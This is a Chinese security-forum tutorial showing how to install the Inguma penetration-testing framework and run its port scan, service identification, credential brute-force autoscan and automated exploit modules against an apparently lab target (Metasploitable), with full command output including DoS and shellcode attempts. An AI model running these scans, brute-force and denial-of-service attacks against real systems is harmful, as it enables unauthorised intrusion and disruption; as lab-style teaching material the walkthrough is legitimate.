切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
172 网络信息扫描 inguma[复制链接]
发表于 2012-10-2 00:50:39 | 显示全部楼层 |!read_mode!
  1. root@Dis9Team:/tmp# wget http://sourceforge.net/projects/inguma/files/inguma/Inguma%200.1.0%20%28R1%29/inguma-0.1.1.tar.gz/download
  2. root@Dis9Team:/tmp# tar xf download
  3. root@Dis9Team:/tmp# mv inguma/ /pen/scanner/
  4. root@Dis9Team:/tmp# cd /pen/scanner/inguma/
  5. root@Dis9Team:/pen/scanner/inguma# sudo apt-get install python-crypto python-scapy  
  6. root@Dis9Team:/pen/scanner/inguma# ./inguma.py
复制代码
  1. root@Dis9Team:/pen/scanner/inguma# apt-get install inguma python-pysnmp-common python-pynetsnmp python-pysnmp-se python-pysnmp4-apps
  2. root@Dis9Team:/pen/scanner/inguma# apt-get install bzr bzrtools python-bzrlib python-configobj python-paramiko
  3. root@Dis9Team:/pen/scanner/inguma# apt-get install python-bluez
复制代码

启动有个错误:cx_Oracle oracle-xe-universal_10.2.0.1-1.0_i386.deb这个包 建议别安装

简单用法

设置目标:

  1. inguma> target = "1.1.1.4"
复制代码
运行TCP扫描模块

  1. inguma> tcpscan
  2. Scanning port 17004 (417/417)
  3. Open ports
  4. ----------

  5. Port 3632/distcc is open
  6. Port 8009 is open
  7. Port 3306/mysql is open
  8. Port 139/netbios-ssn is open
  9. Port 80/www is open
  10. Port 21/ftp is open
  11. Port 22/ssh is open
  12. Port 23/telnet is open
  13. Port 5432/postgresql is open
  14. Port 25/smtp is open
  15. Port 445/microsoft-ds is open

  16. inguma>
复制代码
当然结果不正确,换个方法
设置最大端口:

  1. inguma> port = 8080
复制代码
运行

  1. inguma> identify
  2. Port 21 : ProFTPD 1.3.1 Server (Debian) [::ffff:1.1.1.4]
  3. Port 22 : 2.0-OpenSSH_4.7p1 Debian-8ubuntu1
  4. Port 23 : Telnet Server
  5. Port 25 : metasploitable.localdomain ESMTP Postfix (Ubuntu)
  6. Port 80 : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
  7. Port 139 : SMB Server <Unknown>-Unix/Samba 3.0.20-Debian
  8. Port 445 : SMB Server <Unknown>-Unix/Samba 3.0.20-Debian
  9. Port 3306 : Unknow
  10. Port 3632 : Unknow
  11. Port 5432 : Unknow
  12. Port 8009 : Unknow
  13. inguma>
复制代码
模块:autoscan他会自动扫描 破解扫描到的协议! 包括WEB ,自己试试才知道哦
inguma> autoscan
Brute force username and passwords (y/n)[n]: y
Automagically fuzz available targets (y/n)[n]: y
Print to filename (enter for stdout):
Inguma ‘autoscan’ report started at Mon Jul 9 14:34:31 2012
————————————————————模块:exploit简单的自动溢出测试 大部分是DOS,拒绝服务器
  1. inguma> exploit
  2. Select module [all]:
  3. Running sidvault ...
  4. Getting shellcode for 0.0.0.0:4444 with os type 1 and payload 2
  5. [+] Exploit sended. Connecting to port 4444
  6. Error [Errno 111] Connection refused
  7. Running oragateway ...
  8. [!] No suitable PL/SQL gateway evasion method found :(
  9. Running autofuzz ...
  10. Running oraoiddos ...
  11. [+] Connecting to ldap://1.1.1.4:80...
  12. [+] Sending packet...
  13. [+] Checking OID's health...
  14. global name 'checkHealth' is not defined
  15. Running oratt70dos1 ...
  16. Exploit sended, waiting for a while...
  17. Exploit doesn't work :(
  18. Running oratt70dos3 ...
  19. Unknown module type 'dos'
  20. Error local variable 'ret' referenced before assignment
  21. Running oratt70dos4 ...
  22. [!] Exploit doesn't work
  23. Running spoolssdos ...

  24. Trying to exploit ...

  25. Memory size [1024]: 1024
  26. [*] Connecting to 1.1.1.4:445
  27. [+] Connected
  28. Error ('Error while reading from remote', 255, None)
  29. Running oratt70dos2 ...
  30. Exploit sended, waiting for a while...
  31. Exploit doesn't work :(
  32. Running wksdos ...

  33. Trying to exploit ...

  34. Memory size [1024]: 1024
  35. [*] Connecting to 1.1.1.4:445 (NULL Session)
  36. [-] SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRbadpipe(Pipe invalid.)
  37. Running sunproxybof ...
  38. [+] Launching attack against 1.1.1.4:80
  39. Running ftpdwdos ...
  40. [+] Launching attack against 1.1.1.4:80 ...
  41. [+] Exploit works: Error tuple index out of range
  42. Running sunproxydos ...
  43. [+] Launching attack against 1.1.1.4:80
  44. --> Connection #1999Running ftpfuzz ...
  45. Fuzzing cmd USER
  46. Fuzzing var 2:1
  47. Fuzzing var 2:2
  48. Fuzzing var 2:3
  49. Fuzzing var 2:4
  50. Fuzzing var 2:5
  51. Fuzzing var 2:6
  52. Fuzzing var 2:7
  53. Fuzzing var 2:8
  54. Fuzzing var 2:9
  55. Fuzzing var 2:10
  56. Fuzzing var 2:11
  57. Fuzzing var 2:12
  58. Fuzzing var 2:13
  59. Fuzzing var 2:14
  60. Fuzzing var 2:15
  61. Fuzzing var 2:16
  62. Fuzzing var 2:17
  63. Fuzzing var 2:18
  64. Fuzzing var 2:19
  65. Fuzzing var 2:20
  66. Fuzzing var 2:21
  67. Exception timed out
  68. Fuzzing var 2:22
  69. Exception timed out
  70. Fuzzing var 2:23
  71. Exception timed out
  72. Fuzzing var 2:24
  73. Fuzzing var 2:25
  74. Fuzzing var 2:26
  75. Fuzzing var 2:27
  76. Fuzzing var 2:28
  77. Fuzzing var 2:29
  78. Fuzzing var 2:30
  79. Fuzzing var 2:31
  80. Fuzzing var 2:32
  81. Fuzzing var 2:33
  82. Fuzzing var 2:34
  83. Fuzzing var 2:35
  84. Fuzzing var 2:36
  85. Fuzzing var 2:37
  86. Fuzzing var 2:38
  87. Fuzzing var 2:39
  88. Fuzzing var 2:40
  89. Fuzzing var 2:41
  90. Fuzzing var 2:42
  91. Fuzzing var 2:43
  92. Fuzzing var 2:44
  93. Fuzzing var 2:45
  94. Fuzzing var 2:46
  95. Error integer out of range for 'l' format code
  96. inguma>
复制代码
界面模式:
  1. root@Dis9Team:/pen/scanner/inguma# ./ingumagui.py
复制代码




操千曲而后晓声,观千剑而后识器。
发表于 2015-4-8 13:39:31 | 显示全部楼层

代码区

GMT+8, 2020-9-28 11:06

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部